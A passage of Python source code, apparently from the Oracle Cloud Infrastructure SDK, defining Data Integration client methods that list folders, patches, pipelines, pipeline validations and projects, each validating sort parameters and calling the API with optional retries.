Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ExternalPublicationSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_external_publications.py.html>`__ to see an example of how to use list_external_publications API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublications"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"fields",
"name",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_external_publications got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ExternalPublicationSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ExternalPublicationSummaryCollection")
def list_folders(self, workspace_id, **kwargs):
"""
Retrieves a list of folders in a project and provides options to filter the list.
:param str workspace_id: (required)
The workspace ID.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str aggregator_key: (optional)
Used to filter by the project or the folder object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.FolderSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_folders.py.html>`__ to see an example of how to use list_folders API.
"""
resource_path = "/workspaces/{workspaceId}/folders"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"aggregator_key",
"fields",
"name",
"identifier",
"page",
"limit",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_folders got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"aggregatorKey": kwargs.get("aggregator_key", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="FolderSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="FolderSummaryCollection")
def list_patch_changes(self, workspace_id, application_key, **kwargs):
"""
Retrieves a list of patches in an application and provides options to filter the list.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str name: (optional)
Used to filter by the name of the object.
:param str since_patch: (optional)
Specifies the patch key to query from.
:param str to_patch: (optional)
Specifies the patch key to query to.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PatchChangeSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_patch_changes.py.html>`__ to see an example of how to use list_patch_changes API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/patchChanges"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"name",
"since_patch",
"to_patch",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_patch_changes got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"name": kwargs.get("name", missing),
"sincePatch": kwargs.get("since_patch", missing),
"toPatch": kwargs.get("to_patch", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PatchChangeSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PatchChangeSummaryCollection")
def list_patches(self, workspace_id, application_key, **kwargs):
"""
Retrieves a list of patches in an application and provides options to filter the list. For listing changes based on a period and logical objects changed, see ListPatchChanges API.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the published object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PatchSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_patches.py.html>`__ to see an example of how to use list_patches API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/patches"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"name",
"identifier",
"fields",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_patches got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PatchSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PatchSummaryCollection")
def list_pipeline_validations(self, workspace_id, **kwargs):
"""
Retrieves a list of pipeline validations within the specified workspace.
:param str workspace_id: (required)
The workspace ID.
:param str key: (optional)
Used to filter by the key of the object.
:param str name: (optional)
Used to filter by the name of the object.
:param str identifier: (optional)
Used to filter by the identifier of the object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PipelineValidationSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_pipeline_validations.py.html>`__ to see an example of how to use list_pipeline_validations API.
"""
resource_path = "/workspaces/{workspaceId}/pipelineValidations"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"key",
"name",
"identifier",
"fields",
"page",
"limit",
"sort_by",
"sort_order",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_pipeline_validations got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"key": kwargs.get("key", missing),
"name": kwargs.get("name", missing),
"identifier": kwargs.get("identifier", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PipelineValidationSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PipelineValidationSummaryCollection")
def list_pipelines(self, workspace_id, **kwargs):
"""
Retrieves a list of pipelines in a project or folder from within a workspace, the query parameter specifies the project or folder.
:param str workspace_id: (required)
The workspace ID.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str aggregator_key: (optional)
Used to filter by the project or the folder object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PipelineSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_pipelines.py.html>`__ to see an example of how to use list_pipelines API.
"""
resource_path = "/workspaces/{workspaceId}/pipelines"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"aggregator_key",
"fields",
"name",
"identifier",
"limit",
"page",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_pipelines got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"aggregatorKey": kwargs.get("aggregator_key", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PipelineSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PipelineSummaryCollection")
def list_projects(self, workspace_id, **kwargs):
"""
Retrieves a lists of projects in a workspace and provides options to filter the list.
:param str workspace_id: (required)
The workspace ID.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ProjectSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_projects.py.html>`__ to see an example of how to use list_projects API.
"""
resource_path = "/workspaces/{workspaceId}/projects"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"fields",
"name",
"identifier",
"page",
"limit",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_projects got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ProjectSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ProjectSummaryCollection")
def list_published_objects(self, workspace_id, application_key, **kwargs):
"""
Retrieves a list of all the published objects for a specified application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the published object.
:param list[str] type: (optional)
Used to filter by the object type of the object.
It can be suffixed with an optional filter operator InSubtree.
For Data Integration APIs, a filter based on type Task is used.
:param str type_in_subtree: (optional)
Used in association with type parameter. If value is true,
then type all sub types of the given type parameter is considered.
If value is false, then sub types are not considered. Default is false.
:param int limit: (optional)
